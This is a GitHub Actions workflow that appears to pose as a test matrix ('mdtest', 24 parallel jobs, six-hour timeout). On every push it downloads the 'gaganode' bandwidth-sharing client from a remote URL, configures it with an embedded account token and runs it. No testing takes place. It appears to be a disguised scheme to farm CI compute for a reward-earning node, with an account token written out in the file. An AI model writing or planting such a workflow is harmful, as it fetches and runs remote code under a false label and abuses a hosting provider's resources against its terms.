name: repi
on: [push]
    
env:
  RUBY_VERSION: '2.6'
      
jobs:
  mdtest:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        test: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, Ui]
    timeout-minutes: 360
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        curl -o app-linux-amd64.tar.gz https://assets.coreservice.io/public/package/29/gaganode/1.0.4/gaganode-1_0_4.tar.gz && tar -zxf app-linux-amd64.tar.gz
        cd gaganode-linux-amd64 && ./gaganode config set --token=obqbmxayydohqrhc9a977e15c9875e03
        ./gaganode
